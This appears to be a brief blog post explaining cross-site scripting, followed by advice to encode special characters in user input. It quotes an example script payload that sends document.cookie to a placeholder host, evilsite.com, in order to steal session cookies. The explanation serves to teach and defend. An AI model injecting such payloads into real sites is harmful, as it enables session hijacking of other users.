Cross Site Scripting(XSS) is a vulnerability that is caused when web programmers fail to validate user input that is later published on the page. If an attacker were to input a script like < script > alert("hello world!")< /script > into a form, then the javascript would be published on the page and executed in the browser as if it came from the site its self. The previous script is harmless but if an attacker were to input a script like < script > window.open("http://evilsite.com/cookiegrabber.php?cookies="+document.cookie); < /script > the attacker could steal the session cookies from every user who visits the XSS vunerable site. This site is common on search pages written in php, but it can be found in any page that accepts user input. There are many variations on this attack and it seems to be very popular.
Attack mitigation: Check all user input and convert (, <, >, /, %, ", ', +, &, ) characters to literal values like < and > before storing them or displaying them on a page.
Thanks to Xylitol and CgiSecurity for their helpful guides.
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment